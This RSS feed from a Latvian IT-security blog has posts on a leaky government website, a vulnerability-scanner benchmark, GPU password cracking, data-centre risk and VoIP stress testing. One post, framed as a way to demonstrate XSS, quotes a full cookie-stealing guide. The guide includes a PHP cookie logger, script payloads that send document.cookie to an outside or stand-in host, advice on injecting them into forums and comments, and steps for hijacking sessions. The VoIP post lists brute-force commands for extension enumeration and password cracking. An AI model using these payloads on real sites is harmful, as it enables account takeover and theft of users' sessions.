<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>IT sviestapika &#187; Drošība</title>
	<atom:link href="http://dll.lv/category/drosiba/feed" rel="self" type="application/rss+xml" />
	<link>http://dll.lv</link>
	<description>Par IT un ne tikai</description>
	<lastBuildDate>Sun, 29 Jan 2012 13:55:30 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Apollo raksta, ka bija ievainojama probacija.lv mājaslapa</title>
		<link>http://dll.lv/apollo-raksta-ka-bija-ievainojama-probacija-lv-majaslapa?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=apollo-raksta-ka-bija-ievainojama-probacija-lv-majaslapa</link>
		<comments>http://dll.lv/apollo-raksta-ka-bija-ievainojama-probacija-lv-majaslapa#comments</comments>
		<pubDate>Mon, 23 Jan 2012 08:42:26 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[easy hack]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[probacija.lv]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1813</guid>
		<description><![CDATA[Jāpiefiksē vēsturei. Cik sapratu, tad šīs publikācijas mērķis bija noreklamēt testētāju, kuri to darīja bez saskaņošanas. Diez vai tas nostrādā? Es personīgi šādiem tipiem neuzticētu testēšanu. Principā par šādu rīcību prasītos notiesājošs spriedums. http://www.apollo.lv/portal/news/articles/262237 Kā pārliecinājās aģentūra LETA, izmantojot minētās &#8230; <a href="http://dll.lv/apollo-raksta-ka-bija-ievainojama-probacija-lv-majaslapa">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/uzlauzta-vienotibas-majaslapa' rel='bookmark' title='Uzlauzta Vienotības mājaslapa'>Uzlauzta Vienotības mājaslapa</a></li>
<li><a href='http://dll.lv/uzlauzta-mezavairogu-majaslapa' rel='bookmark' title='Uzlauzta &#8220;Mežavairogu&#8221; mājaslapa.'>Uzlauzta &#8220;Mežavairogu&#8221; mājaslapa.</a></li>
<li><a href='http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa' rel='bookmark' title='Drošības caurums CSDD un Parex mājaslapā'>Drošības caurums CSDD un Parex mājaslapā</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Jāpiefiksē vēsturei.<br />
Cik sapratu, tad šīs publikācijas mērķis bija noreklamēt testētāju, kuri to darīja bez saskaņošanas. Diez vai tas nostrādā? Es personīgi šādiem tipiem neuzticētu testēšanu.<br />
Principā par šādu rīcību prasītos notiesājošs spriedums. </p>
<p>http://www.apollo.lv/portal/news/articles/262237</p>
<blockquote><p>Kā pārliecinājās aģentūra LETA, izmantojot minētās mājaslapas tehniskās nepilnības, ikvienam interneta lietotājam bija iespējams iegūt informāciju par dienestā strādājošo ierēdņu algām, kā arī viņu personīgos datus.</p>
<p>Izmantojot būtiskus pārkāpumus mājaslapas drošībā, «ir iespējams iegūt un manipulēt ar pilnīgi visu informāciju, kura atrodas uz servera, ieskaitot pašu serveri», norādīja «Influent».</p>
<p>Drošības testētāji esot informējuši par atrasto «caurumu» arī pašu VPD, bet atbildi no tā neesot sagaidījuši.</p>
<p>Adrese uz visiem publiski pieejamajiem VPD failiem, kas augšupielādēti uz servera, bija gluži vienkārša &#8211; «www.probacija.lv/upload».</p>
<p>Tomēr īsi pēc aģentūras LETA ziņas publicēšanas minētais «caurums» tika «aizlāpīts», līdz ar to dati publiskajā vidē vairs nav pieejami.</p>
<p>Vienā no neaizsargātajiem failiem drošības pārkāpumu testētāji esot atraduši dokumentu, kurā redzams, ka par mājaslapas izstrādi no valsts budžeta paprasīti vairāk nekā 1000 lati, lai gan izstrādātājiem samaksāts vien ap 300 latiem.</p>
<p>VPD pārstāvis Imants Mozers aģentūrai LETA sacīja, ka, uzzinot par šo situāciju, dienests sācis to vērtēt. «Tiklīdz būs zināmi notikušā apstākļi un plašāks skaidrojums, arī mēs sniegsim informāciju,» norādīja Mozers, piebilstot, ka pagaidām nav saprotams, kā šāda veida dati varējuši būt pieejami publiskā vidē.</p>
<p>VPD mājaslapa esot izstrādāta 2004.gadā. Arī intranets dienestam izstrādāts sen, bet Mozers nemācēja pateikt konkrētu gadu.</p>
<p>VPD mājaslapa ir izvietota uz SIA «Lattelecom» serveriem.</p>
<p>Mozers piebilda, &#8211; viņa rīcībā nav informācijas, ka drošības testētāji iepriekš būtu ziņojuši VPD par atrasto «caurumu» dienesta mājaslapā. </p></blockquote>
<p>Related posts:<ol>
<li><a href='http://dll.lv/uzlauzta-vienotibas-majaslapa' rel='bookmark' title='Uzlauzta Vienotības mājaslapa'>Uzlauzta Vienotības mājaslapa</a></li>
<li><a href='http://dll.lv/uzlauzta-mezavairogu-majaslapa' rel='bookmark' title='Uzlauzta &#8220;Mežavairogu&#8221; mājaslapa.'>Uzlauzta &#8220;Mežavairogu&#8221; mājaslapa.</a></li>
<li><a href='http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa' rel='bookmark' title='Drošības caurums CSDD un Parex mājaslapā'>Drošības caurums CSDD un Parex mājaslapā</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/apollo-raksta-ka-bija-ievainojama-probacija-lv-majaslapa/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Kā nodemonstrēt XSS ievainojamību</title>
		<link>http://dll.lv/ka-nodemonstret-xss-ievainojamibu?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ka-nodemonstret-xss-ievainojamibu</link>
		<comments>http://dll.lv/ka-nodemonstret-xss-ievainojamibu#comments</comments>
		<pubDate>Sat, 21 Jan 2012 16:02:35 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Apmācība]]></category>
		<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1804</guid>
		<description><![CDATA[Ja ir nepieciešams nodemonstrēt kādā veidā var izmantot XSS ievainojamību kādā mājas lapā, tad var izmantot autora izveidoto php skriptu, lai nebūtu jāizveido divritenis no sākuma. Otrs veids ir izmantot šo pieeju. Savkārt ievietot jau mājaslapā pārsūtāmo informāciju visbiežāk izdevies &#8230; <a href="http://dll.lv/ka-nodemonstret-xss-ievainojamibu">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/www-zz-lv-un-xss' rel='bookmark' title='www.zz.lv un XSS'>www.zz.lv un XSS</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/lapas-redirect' rel='bookmark' title='Lapas redirect'>Lapas redirect</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Ja ir nepieciešams nodemonstrēt kādā veidā var izmantot XSS ievainojamību kādā mājas lapā, tad var izmantot <a href="http://hackiteasy.blogspot.com/2011/01/session-hijacking-or-cookie-stealing.html">autora</a> izveidoto php skriptu, lai nebūtu jāizveido divritenis no sākuma.</p>
<p>Otrs veids ir izmantot <a href="http://www.criticalsecurity.net/index.php/topic/7137-how-to-make-a-cookie-stealer/">šo</a> pieeju.<br />
<span id="more-1804"></span><br />
Savkārt ievietot jau mājaslapā pārsūtāmo informāciju visbiežāk izdevies izmantojot <a href="http://jehiah.cz/a/xss-stealing-cookies-101">šo</a> piemēru:</p>
<p>&lt;p&gt;script><br />
new Image().src=&#8221;http://jehiah.com/_sandbox/log.cgi?c=&#8221;+encodeURI(document.cookie);<br />
&lt;p&gt;/script></p>
<blockquote><p>In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim&#8217;s computer (see HTTP cookie theft).</p>
<p>Here we show how you can hack a session using javascript and php.</p>
<p>What is a cookie?</p>
<p>A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.<br />
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.<br />
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.</p>
<p>What can we do after stealing cookie?</p>
<p>Well,as we know web sites authenticate their user&#8217;s with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.</p>
<p>This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.</p>
<p>PHP Code:<br />
<!--?php function GetIP() { if (getenv("HTTP_CLIENT_IP") &#038;&#038; strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") &#038;&#038; strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") &#038;&#038; strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) &#038;&#038; $_SERVER['REMOTE_ADDR'] &#038;&#038; strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="log.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie "); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); ?--></p>
<p>Save the script as a cookielogger.php on your server.<br />
(You can get any free webhosting easily such as justfree,x10hosting etc..)</p>
<p>Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.</p>
<p>Now for the hack to work we have to inject this piece of javascript into the target&#8217;s page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.</p>
<p>The best way is to look for user interactive sites which contain comments or forums.</p>
<p>Post the following code which invokes or activates the cookielogger on your host.</p>
<p>Code:<br />
&lt;p&gt;script type=&#8221;text/javascript&#8221; language=&#8221;Java script&#8221;>// <![CDATA[<br />
document.location="http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;<br />
// ]]&gt;&lt;p&gt;/script></p>
<p>Your can also trick the victim into clicking a link that activates javascript.<br />
Below is the code which has to be posted.</p>
<p>Code:<br />
&lt;p&gt;a href=&#8221;java script:document.location=&#8217;http://www.yourhost.com/cookielogger.php?cookie=&#8217;+document.cookie;&#8221;>Click here!</a></p>
<p>Clicking an image also can activate the script.For this purpose you can use the below code.</p>
<p>Code:</p>
<p>&lt;p&gt;img src=&#8221;URL OF THE IMAGE&#8221; alt=&#8221;" /></p>
<p>All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver</p>
<p>In the above codes please remove the space in between javascript.</p>
<p>Hijacking the Session:</p>
<p>Now we have cookie,what to do with this..?<br />
Download cookie editor mozilla plugin or you may find other plugins as well.</p>
<p>Go to the target site&#8211;&gt;open cookie editor&#8211;&gt;Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573</p>
<p>Don&#8217;t forget to comment if you like my post.<br />
by hackiteasy</p></blockquote>
<p>Related posts:<ol>
<li><a href='http://dll.lv/www-zz-lv-un-xss' rel='bookmark' title='www.zz.lv un XSS'>www.zz.lv un XSS</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/lapas-redirect' rel='bookmark' title='Lapas redirect'>Lapas redirect</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/ka-nodemonstret-xss-ievainojamibu/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WEB aplikāciju testēšanas rīku salīdzinājums</title>
		<link>http://dll.lv/web-aplikaciju-testesanas-riku-salidzinajums?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=web-aplikaciju-testesanas-riku-salidzinajums</link>
		<comments>http://dll.lv/web-aplikaciju-testesanas-riku-salidzinajums#comments</comments>
		<pubDate>Mon, 28 Nov 2011 09:23:31 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Apmācība]]></category>
		<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[penetration test]]></category>
		<category><![CDATA[WAVSEP]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1742</guid>
		<description><![CDATA[Internetā ir pieejams WAVSEP (Web Application Vulnerability Scanner Evaluation Project) projekts, kurš izmantojot dažādus scenārijus salīdzina aplikāciju testēšanas rīkus. Tiek testēts izmantojot šādus testus: Project WAVSEP currently consists of the following test cases: 64 Reflected XSS test cases (32 GET &#8230; <a href="http://dll.lv/web-aplikaciju-testesanas-riku-salidzinajums">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/testesanas-riki' rel='bookmark' title='WEB testēšanas rīki'>WEB testēšanas rīki</a></li>
<li><a href='http://dll.lv/www-zz-lv-un-xss' rel='bookmark' title='www.zz.lv un XSS'>www.zz.lv un XSS</a></li>
<li><a href='http://dll.lv/banku-internetbanku-autentifikacijas-un-autorizacijas-drosibas-salidzinajums' rel='bookmark' title='Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums'>Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Internetā ir pieejams WAVSEP (Web Application Vulnerability Scanner Evaluation Project) projekts, kurš izmantojot dažādus scenārijus salīdzina aplikāciju testēšanas rīkus.</p>
<p>Tiek testēts izmantojot šādus testus:</p>
<p><em>Project WAVSEP currently consists of the following test cases:</em></p>
<p><em>64 Reflected XSS test cases (32 GET cases, 32 POST cases -&gt; 66 total vulnerabilities)</em></p>
<p><em>130 SQL Injection test cases, most of them implemented for MySQL &amp; MSSQL (65 GET cases, 65 POST Vases -&gt; 136 total vulnerabilities)</em></p>
<p><em>o The list of test cases includes vulnerable pages that respond with 500 HTTP errors, 200 HTTP Responses with erroneous text, 200 HTTP Responses with differentiation or completely identical 200 HTTP responses.</em></p>
<p><em>o 80 out of 136 cases are simple SQL injection test cases (500 &amp; 200 erroneous HTTP responses), and 56 are Blind SQL Injection test cases (valid and identical 200 HTTP responses).</em></p>
<p><em> 7 different categories of false positive Reflected XSS vulnerabilities (GET OR POST).</em></p>
<p><em>10 different categories of false positive SQL Injection vulnerabilities (GET OR POST)</em></p>
<p>Projekts tiek hostēts iekš <a href="http://code.google.com/p/wavsep/">googles</a> un vairāk par to var lasīt izstrādātāja <a href="http://sectooladdict.blogspot.com">blogā</a>.</p>
<p>Principā ir laiks pārvērtēt izmantotos rīkus.</p>
<p>Kādu laiku atpakaļ pats testēju vairākus atvērtā tipa rīkus izmantojot vienkāršu scenāriju- uzstādīju vairākas vecas wordpress un joomla versijas ar zināmiem ievainojumiem. Diemžēl rezultāts mani apbēdināja, jo bieži rīki nespēja atrast pat dažas ļoti vienkārša XSS ievainojamības.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/testesanas-riki' rel='bookmark' title='WEB testēšanas rīki'>WEB testēšanas rīki</a></li>
<li><a href='http://dll.lv/www-zz-lv-un-xss' rel='bookmark' title='www.zz.lv un XSS'>www.zz.lv un XSS</a></li>
<li><a href='http://dll.lv/banku-internetbanku-autentifikacijas-un-autorizacijas-drosibas-salidzinajums' rel='bookmark' title='Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums'>Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/web-aplikaciju-testesanas-riku-salidzinajums/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ar grafiskā procesora palīdzību paroles var uzlauzt daudz ātrāk</title>
		<link>http://dll.lv/ar-grafiska-procesora-palidzibu-paroles-var-uzlauzt-daudz-atrak?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ar-grafiska-procesora-palidzibu-paroles-var-uzlauzt-daudz-atrak</link>
		<comments>http://dll.lv/ar-grafiska-procesora-palidzibu-paroles-var-uzlauzt-daudz-atrak#comments</comments>
		<pubDate>Fri, 02 Sep 2011 05:52:51 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1709</guid>
		<description><![CDATA[Diezgan biedējoši- tam, kam agrāk vajadzēja 43 gadus, tagad pietiek ar 48 dienām bez lielas piepūles. Pati pieeja nav jauna, bet gribēju padalīties ar labu rakstu, kur autors detalizētāki ir papētījis šo jautājumu. Ir vērts izlasīt. Un vēl viena cilvēka &#8230; <a href="http://dll.lv/ar-grafiska-procesora-palidzibu-paroles-var-uzlauzt-daudz-atrak">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/nozagtas-facebook-lietotaju-paroles' rel='bookmark' title='Nozagtas Facebook lietotāju paroles'>Nozagtas Facebook lietotāju paroles</a></li>
<li><a href='http://dll.lv/kad-efektivitate-var-but-kaitiga' rel='bookmark' title='Kad efektivitāte var būt kaitīga'>Kad efektivitāte var būt kaitīga</a></li>
<li><a href='http://dll.lv/meklejot-letako-hostingu-vai-ari-vai-hostejot-var-kaut-ko-nopelnit' rel='bookmark' title='Meklējot lētāko hostingu vai arī- vai hostējot var kaut ko nopelnīt?'>Meklējot lētāko hostingu vai arī- vai hostējot var kaut ko nopelnīt?</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Diezgan biedējoši- tam, kam agrāk vajadzēja 43 gadus, tagad pietiek ar 48 dienām bez lielas piepūles.<br />
Pati pieeja nav jauna, bet gribēju padalīties ar labu <a href="http://erratasec.blogspot.com/2011/06/password-cracking-mining-and-gpus.html">rakstu</a>, kur autors detalizētāki ir papētījis šo jautājumu. Ir vērts izlasīt.<br />
Un vēl viena cilvēka <a href="http://mytechencounters.wordpress.com/2011/04/03/gpu-password-cracking-crack-a-windows-password-using-a-graphic-card/">pētījums</a>.<br />
Es gan nepiekrītu abiem autoriem, ka paroles sākot no 10 simboliem ir drošībā, jo slodzi var sadalīt un pateicoties mākoņdatošanas pakalpojumiem vajag tikai noīrēt vairāk dzelžu.<br />
Šis gan attiecas uz paroļu minēšanu, kura padodas brute-force uzbrukumam.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/nozagtas-facebook-lietotaju-paroles' rel='bookmark' title='Nozagtas Facebook lietotāju paroles'>Nozagtas Facebook lietotāju paroles</a></li>
<li><a href='http://dll.lv/kad-efektivitate-var-but-kaitiga' rel='bookmark' title='Kad efektivitāte var būt kaitīga'>Kad efektivitāte var būt kaitīga</a></li>
<li><a href='http://dll.lv/meklejot-letako-hostingu-vai-ari-vai-hostejot-var-kaut-ko-nopelnit' rel='bookmark' title='Meklējot lētāko hostingu vai arī- vai hostējot var kaut ko nopelnīt?'>Meklējot lētāko hostingu vai arī- vai hostējot var kaut ko nopelnīt?</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/ar-grafiska-procesora-palidzibu-paroles-var-uzlauzt-daudz-atrak/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>VID datucentru problēma un DEAC neveiksmīga PR kampaņa</title>
		<link>http://dll.lv/vid-datucentru-problema-un-deac-neveiksmiga-pr-kampana?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=vid-datucentru-problema-un-deac-neveiksmiga-pr-kampana</link>
		<comments>http://dll.lv/vid-datucentru-problema-un-deac-neveiksmiga-pr-kampana#comments</comments>
		<pubDate>Fri, 05 Aug 2011 07:08:17 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Dzīve]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Vadība]]></category>
		<category><![CDATA[DEAC]]></category>
		<category><![CDATA[drošs risinājums]]></category>
		<category><![CDATA[EDS]]></category>
		<category><![CDATA[risk]]></category>
		<category><![CDATA[riski]]></category>
		<category><![CDATA[risks]]></category>
		<category><![CDATA[VID]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1692</guid>
		<description><![CDATA[Pārlasīju mēdijos publicētos DEAC rakstus par VID datu centra dīkstāvi elektrības pārtraukuma rezultātā. Personīgi nepazīstu nevienu VID IT pārstāvi, bet manuprāt jocīgi (neticami) izklausījās Gailīša paziņojums -&#8221;VID nerēķinās ar riskiem&#8221;, jo: 1. Valsts informācijas sistēmu likums nosaka, ka riski ir &#8230; <a href="http://dll.lv/vid-datucentru-problema-un-deac-neveiksmiga-pr-kampana">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/risks-iespeja-zaudet-vai-iespeja-iegut' rel='bookmark' title='Risks- iespēja zaudēt vai iespēja iegūt?'>Risks- iespēja zaudēt vai iespēja iegūt?</a></li>
<li><a href='http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas' rel='bookmark' title='Kā tika nolādēti dati no VID EDS sistēmas?'>Kā tika nolādēti dati no VID EDS sistēmas?</a></li>
<li><a href='http://dll.lv/riska-vadibas-strategijas-uznemuma-1-dala' rel='bookmark' title='Riska vadības stratēģijas uzņēmumā (1. daļa)'>Riska vadības stratēģijas uzņēmumā (1. daļa)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Pārlasīju mēdijos publicētos DEAC <a href="http://www.db.lv/tehnologijas/deac-vid-neatbilstosi-uztur-datus-nerekinoties-ar-riskiem-242575">rakstus</a> par VID datu centra dīkstāvi elektrības pārtraukuma rezultātā.</p>
<p>Personīgi nepazīstu nevienu VID IT pārstāvi, bet manuprāt jocīgi (neticami) izklausījās Gailīša paziņojums -&#8221;VID nerēķinās ar riskiem&#8221;, jo:</p>
<p>1. Valsts informācijas sistēmu likums nosaka, ka riski ir jāizvērtē (negribas ticēt, ka šo punktu kāds ignorē);</p>
<p>2. Jebkura biznesa uzdevums nav izslēgt pilnīgi visus riskus, bet sabalansēt to iestāšanās ietekmes zaudējumus pret nepieciešamām investīcijām to novēršanā.</p>
<p>Risku novērtēšanas piemērs, kurš uzreiz nāk prātā:</p>
<p>Risks- elektrības pārtraukuma gadījumā ģeneratora jauda neapmierina DC nepieciešamo.</p>
<p>Riska iestāšanās varbūtība &#8211; 1 x gadā.</p>
<p>Riska ietekme &#8211; informācijas sistēma nav pieejama līdz elektrības padeve atjaunojas (vidēji 4h).</p>
<p>Riska novēršanas scenārijs- iegādāties jaudīgāku ģeneratoru &#8211; 200 000 Ls</p>
<p>Piedāvātais risku mazinošais pasākums bez ģeneratoru iegādes- atslēgt mazāk svarīgus serverus iegūstot jaudu kritiskākiem resursiem vai arī laicīgi veikt drošu sistēmas izslēgšanu neapdraudot datu integritāti.</p>
<p>Augstākminētais piemērs ir mans pieņēmums (uzskatu vismaz 90% korekts), bet tas labi ilustrē, ka ne vienmēr ir izdevīgi novērst visus riskus. Jāņem vērā to, kas vienam ir nepieņemams risks, tas otram ir pieņemams, piemēram, bankas neriskēs 200 000 Ls dēļ ar risku- Internetbanka nav pieejama (jo zaudējumi būtu daudz lielāki), bet vai VID šāds risks ir tik būtisks &#8211; nedomāju.</p>
<p>Jāatceras arī tas, ka VID IT budžets veidojas no mūsu nodokļiem, tāpēc katram ir sev jāatbild &#8211;  vai es maksātu X latus par VID IT 4h dīkstāves riska mazināšanu viena gada laikā.</p>
<p>PS. Pēc šī DEAC raksta izskatās, ka zaudētāji ir tikai pats DEAC, jo palasot komentārus visi saprot, ka tas ir tikai PR, kā arī atgādina cilvēkiem par paša DEAC problēmām (vairākas dīkstāves un interneta pieslēguma pārtraukumus).</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/risks-iespeja-zaudet-vai-iespeja-iegut' rel='bookmark' title='Risks- iespēja zaudēt vai iespēja iegūt?'>Risks- iespēja zaudēt vai iespēja iegūt?</a></li>
<li><a href='http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas' rel='bookmark' title='Kā tika nolādēti dati no VID EDS sistēmas?'>Kā tika nolādēti dati no VID EDS sistēmas?</a></li>
<li><a href='http://dll.lv/riska-vadibas-strategijas-uznemuma-1-dala' rel='bookmark' title='Riska vadības stratēģijas uzņēmumā (1. daļa)'>Riska vadības stratēģijas uzņēmumā (1. daļa)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/vid-datucentru-problema-un-deac-neveiksmiga-pr-kampana/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>VoIP stress tests</title>
		<link>http://dll.lv/voip-stress-tests?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=voip-stress-tests</link>
		<comments>http://dll.lv/voip-stress-tests#comments</comments>
		<pubDate>Tue, 21 Jun 2011 19:41:45 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[back track]]></category>
		<category><![CDATA[back track 5]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[penetration test]]></category>
		<category><![CDATA[tests]]></category>
		<category><![CDATA[VoIP]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1625</guid>
		<description><![CDATA[Man palūdza veikt vienas VoIP platformas autentifikācijas stress testu, jo vajadzēja notestēt jauno DOS aizsardzības mehānismu. Pēc daudzu materiālu izlasīšanas un rīku testēšanas konstatēju, ka man vislabāk patīk: svmap.py &#8211; VoIP PBX meklēšanai (man nebija nepieciešams, jo pamat info jau &#8230; <a href="http://dll.lv/voip-stress-tests">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/administratoru-tests' rel='bookmark' title='Administratoru tests'>Administratoru tests</a></li>
<li><a href='http://dll.lv/drupal-stress-test' rel='bookmark' title='Drupal stress test'>Drupal stress test</a></li>
<li><a href='http://dll.lv/banku-internetbanku-autentifikacijas-un-autorizacijas-drosibas-salidzinajums' rel='bookmark' title='Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums'>Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Man palūdza veikt vienas VoIP platformas autentifikācijas stress testu, jo vajadzēja notestēt jauno DOS aizsardzības mehānismu.<br />
Pēc daudzu materiālu izlasīšanas un rīku testēšanas konstatēju, ka man vislabāk patīk:<br />
svmap.py &#8211; VoIP PBX meklēšanai (man nebija nepieciešams, jo pamat info jau bija zināma. Bet ir noderīgas rīks, ja grib uzzināt kāds tieši PBX slēpjas (taisa fingerprint));<br />
svwar.py &#8211; numuru meklēšanai (sūta gan invite, gan register pieprasījumus);<br />
(no šī rīka labums bija mazs, ja VoIP bija ieslēgts alwaysauthreject, kā rezultātā uz visiem pieprasījumiem tika saņemta vienāda atbilde)<br />
svcrack.py &#8211; paroles brote-force minēšanai.</p>
<p>Sintakse:<br />
./svwar.py -e100-400 192.168.1.104<br />
./svcrack.py -u200 -d wordlist.txt 192.168.1.104</p>
